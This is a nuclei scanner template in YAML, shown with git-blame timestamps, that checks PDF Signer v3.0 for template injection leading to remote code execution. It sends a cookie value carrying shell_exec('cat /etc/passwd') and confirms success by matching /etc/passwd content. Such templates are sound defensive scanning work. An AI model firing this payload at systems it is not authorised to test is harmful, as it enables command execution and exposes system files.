nuclei-templates/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml

26 lines
528 B
YAML
Raw Normal View History

id: pdf-signer-ssti-to-rce
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
tags: ssti,rce
requests:
- method: GET
path:
2021-01-13 07:31:46 +00:00
- "{{BaseURL}}"
headers:
2020-05-24 22:19:21 +00:00
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
2021-10-06 23:53:20 +00:00
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
part: body